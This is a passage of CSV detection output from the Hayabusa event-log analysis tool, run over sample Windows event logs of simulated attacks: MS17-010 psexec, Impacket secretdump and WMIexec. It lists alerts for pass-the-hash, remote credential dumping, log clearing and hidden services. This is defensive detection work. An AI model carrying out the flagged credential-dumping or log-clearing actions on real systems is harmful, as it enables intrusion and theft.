| LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 
0x6c49d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec 
(GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible 
Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 
0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 
+09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 